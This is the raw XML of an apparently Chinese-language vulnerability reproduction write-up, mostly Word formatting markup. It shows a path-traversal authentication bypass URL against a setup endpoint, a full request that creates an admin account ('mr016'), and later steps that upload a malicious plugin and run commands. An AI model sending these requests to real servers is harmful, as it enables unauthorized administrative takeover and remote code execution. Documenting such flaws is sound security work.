          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C3FEB9" w14:textId="65CD8385" w:rsidR="00D727C5" w:rsidRPr="00D727C5" w:rsidRDefault="00D727C5">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D727C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/setup/setup-s/%u002e%u002e/%u002e%u002e/user-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D727C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>groups.jsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6608315F" w14:textId="183B7B7B" w:rsidR="00D727C5" w:rsidRDefault="00D727C5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93D6435" wp14:editId="07387406">
            <wp:extent cx="5274310" cy="28295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E252" w14:textId="65CC71EC" w:rsidR="00D727C5" w:rsidRDefault="00D727C5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发送创建管理员用户</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6F8F5471" w14:textId="58CE96A1" w:rsidR="00D727C5" w:rsidRDefault="00D727C5" w:rsidP="00D727C5">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D727C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=lpX9QrIx5XPipnX&amp;username=mr016&amp;name=&amp;email=&amp;password=mr016%40qq.com&amp;passwordConfirm=mr016%40qq.com</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D727C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&amp;isadmin=on&amp;crea</w:t>
      </w:r>
      <w:r w:rsidRPr="00D727C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>te=%E5%88%9B%E5%BB%BA%E7%94%A8%E6%88%B7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0875830C" w14:textId="54C98103" w:rsidR="00D727C5" w:rsidRDefault="00D727C5" w:rsidP="00D727C5">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>账号为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>mr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>016,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>密码为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>mr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>016@qq.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51672EB9" w14:textId="3AB1D040" w:rsidR="002B6FB5" w:rsidRDefault="002B6FB5" w:rsidP="00D727C5">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine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28EF540" wp14:editId="375E0EDF">
            <wp:extent cx="5274310" cy="9842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45AF" w14:textId="59ECF6B9" w:rsidR="00D727C5" w:rsidRDefault="00D727C5" w:rsidP="00D727C5">
      <w:pPr>
        <w:pStyle w:val="10"/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9E61681" wp14:editId="7A7A8A68">
            <wp:extent cx="5274310" cy="29552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063F" w14:textId="3A72F04C" w:rsidR="00D727C5" w:rsidRDefault="002B6FB5" w:rsidP="00D727C5">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0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发送请求后登录页面，发现登录成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D368ABD" w14:textId="48E5B9A8" w:rsidR="00D727C5" w:rsidRDefault="00D727C5" w:rsidP="00D727C5">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/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0102CE3" wp14:editId="2645AC3A">
            <wp:extent cx="5274310" cy="30283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3291" w14:textId="66795B9D" w:rsidR="00D727C5" w:rsidRDefault="00D727C5" w:rsidP="00D727C5">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58BC853A" w14:textId="534FF130" w:rsidR="002B6FB5" w:rsidRDefault="002B6FB5" w:rsidP="00D727C5">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CE4A697" w14:textId="5D036773" w:rsidR="002B6FB5" w:rsidRDefault="002B6FB5" w:rsidP="00D727C5">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0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688D22" wp14:editId="32AE1FB6">
            <wp:extent cx="5274310" cy="2686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9FB3" w14:textId="05546446" w:rsidR="00D727C5" w:rsidRDefault="002B6FB5" w:rsidP="00C14A5F">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine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上传恶意插件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6194B9" w14:textId="266EEB08" w:rsidR="004C1793" w:rsidRDefault="004C1793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【步骤三】</w:t>
      </w:r>
      <w:r w:rsidR="00C14A5F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>使用恶意的插件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58395B0E" w14:textId="24ED4098" w:rsidR="005F1959" w:rsidRDefault="00C14A5F" w:rsidP="004C1793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CD3C449" wp14:editId="050AF767">
            <wp:extent cx="5274310" cy="279527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A387" w14:textId="445D557A" w:rsidR="005F1959" w:rsidRDefault="00C14A5F" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind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9377E8" wp14:editId="4734819E">
            <wp:extent cx="5274310" cy="29267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034F" w14:textId="13D592B6" w:rsidR="00C14A5F" w:rsidRDefault="00C14A5F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密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036A1162" w14:textId="281D0B1A" w:rsidR="00C14A5F" w:rsidRDefault="00C14A5F" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="10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EFC5583" wp14:editId="153EDFD1">
            <wp:extent cx="5274310" cy="26962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A46E" w14:textId="5A6E8193" w:rsidR="00C14A5F" w:rsidRDefault="00C14A5F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选择执行命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6DBDA4" w14:textId="7E09654C" w:rsidR="00C14A5F" w:rsidRDefault="00C14A5F" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0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49801124" wp14:editId="7C21CEE0">
            <wp:extent cx="5274310" cy="28003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A8DE" w14:textId="00221633" w:rsidR="005F1959" w:rsidRDefault="00BC4C3E" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>命令执行成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6DFD84" w14:textId="77777777" w:rsidR="00961F8D" w:rsidRDefault="00961F8D" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00961F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D573A" w14:textId="77777777" w:rsidR="00785DEB" w:rsidRDefault="00785DEB" w:rsidP="00705A99">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0AFCA055" w14:textId="77777777" w:rsidR="00785DEB" w:rsidRDefault="00785DEB" w:rsidP="00705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597DE" w14:textId="77777777" w:rsidR="00785DEB" w:rsidRDefault="00785DEB" w:rsidP="00705A99">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4613083C" w14:textId="77777777" w:rsidR="00785DEB" w:rsidRDefault="00785DEB" w:rsidP="00705A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3E9BDD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BD3E9BDD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ViNTMyZTBmYjViOGI3ZGQ5MjhkNjE5MDJlMGJiNTQifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="0078712B"/>
    <w:rsid w:val="000057EA"/>
    <w:rsid w:val="0006000C"/>
    <w:rsid w:val="000E0CFA"/>
    <w:rsid w:val="00131DA4"/>
    <w:rsid w:val="001F15C6"/>
    <w:rsid w:val="0025100D"/>
    <w:rsid w:val="002B32D9"/>
    <w:rsid w:val="002B6FB5"/>
    <w:rsid w:val="002E22F7"/>
    <w:rsid w:val="00361277"/>
    <w:rsid w:val="00375CCE"/>
    <w:rsid w:val="003C6EF5"/>
    <w:rsid w:val="003F1296"/>
    <w:rsid w:val="004435E1"/>
    <w:rsid w:val="00452910"/>
    <w:rsid w:val="004B0A83"/>
    <w:rsid w:val="004C1793"/>
    <w:rsid w:val="004E1BBB"/>
    <w:rsid w:val="004E4F70"/>
    <w:rsid w:val="004F3E9D"/>
    <w:rsid w:val="00512D3E"/>
    <w:rsid w:val="00516859"/>
    <w:rsid w:val="005B758B"/>
    <w:rsid w:val="005F1959"/>
    <w:rsid w:val="00633A4A"/>
    <w:rsid w:val="006A1D6C"/>
    <w:rsid w:val="006C2EAA"/>
    <w:rsid w:val="006E30B6"/>
    <w:rsid w:val="006F0165"/>
    <w:rsid w:val="00705A99"/>
    <w:rsid w:val="00785DEB"/>
    <w:rsid w:val="0078712B"/>
    <w:rsid w:val="007D0BA6"/>
    <w:rsid w:val="007F1F6A"/>
    <w:rsid w:val="00860955"/>
    <w:rsid w:val="00886C87"/>
    <w:rsid w:val="00887D7E"/>
    <w:rsid w:val="00961F8D"/>
    <w:rsid w:val="00963091"/>
    <w:rsid w:val="00992E1C"/>
    <w:rsid w:val="009B39E8"/>
    <w:rsid w:val="00A00FDD"/>
    <w:rsid w:val="00A21148"/>
    <w:rsid w:val="00A609F0"/>
    <w:rsid w:val="00A97EAA"/>
    <w:rsid w:val="00AC0119"/>
    <w:rsid w:val="00AC2EA2"/>
    <w:rsid w:val="00B63775"/>
    <w:rsid w:val="00BB6D88"/>
    <w:rsid w:val="00BC4C3E"/>
    <w:rsid w:val="00C14A5F"/>
    <w:rsid w:val="00CB0976"/>
    <w:rsid w:val="00D70244"/>
    <w:rsid w:val="00D727C5"/>
    <w:rsid w:val="00DA5227"/>
    <w:rsid w:val="00E24FC3"/>
    <w:rsid w:val="00E33399"/>
    <w:rsid w:val="00F524F5"/>
    <w:rsid w:val="00F70684"/>
    <w:rsid w:val="00FD0FEA"/>
    <w:rsid w:val="021952DC"/>
    <w:rsid w:val="11E06E41"/>
    <w:rsid w:val="15E3766F"/>
    <w:rsid w:val="1D2B18B9"/>
    <w:rsid w:val="1EAB3DBD"/>
    <w:rsid w:val="294206B6"/>
    <w:rsid w:val="29C33735"/>
    <w:rsid w:val="2C573847"/>
    <w:rsid w:val="34960C3E"/>
    <w:rsid w:val="379E56B4"/>
    <w:rsid w:val="39012385"/>
    <w:rsid w:val="3BBD1E25"/>
    <w:rsid w:val="3F8A6B26"/>
    <w:rsid w:val="41EC0D67"/>
    <w:rsid w:val="480D1A37"/>
    <w:rsid w:val="496D3711"/>
    <w:rsid w:val="49D15412"/>
    <w:rsid w:val="4BB430E1"/>
    <w:rsid w:val="535D7D17"/>
    <w:rsid w:val="557F21C6"/>
    <w:rsid w:val="5DC82230"/>
    <w:rsid w:val="63B42170"/>
    <w:rsid w:val="64AD38C1"/>
    <w:rsid w:val="68024591"/>
    <w:rsid w:val="6E042670"/>
    <w:rsid w:val="6FC0720B"/>
    <w:rsid w:val="707D00C0"/>
    <w:rsid w:val="7113443A"/>
    <w:rsid w:val="72C07522"/>
    <w:rsid w:val="797F1E79"/>
    <w:rsid w:val="79A547A7"/>
    <w:rsid w:val="7B5A38B2"/>
    <w:rsid w:val="7DA41F1A"/>
    <w:rsid w:val="7F8D69DE"/>
    <w:rsid w:val="7FEE1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1DDC38"/>
  <w15:docId w15:val="{9EF1A729-51F5-41CA-B342-21F6F96E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wordWrap w:val="0"/>
      <w:topLinePunct/>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0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semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="1"/>
      </w:num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qFormat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10">
    <w:name w:val="正文1"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:wordWrap w:val="0"/>
      <w:topLinePunct/>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLineChars="200" w:firstLine="880"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="仿宋"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a7"/>
    <w:rsid w:val="00705A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705A9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705A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705A99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705A99"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="ab">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:rsid w:val="00705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87D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887D7E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9090/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp" TargetMode="External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5844</TotalTime>
  <Pages>14</Pages>
  <Words>271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凌空</dc:creator>
  <cp:lastModifiedBy>016 CN</cp:lastModifiedBy>
  <cp:revision>44</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-08-08T16:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-27T15:35:00Z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8BE1C4494BBF49E285AA0D06EFF0E4C2</vt:lpwstr>
  </property>
</Properties>
</file>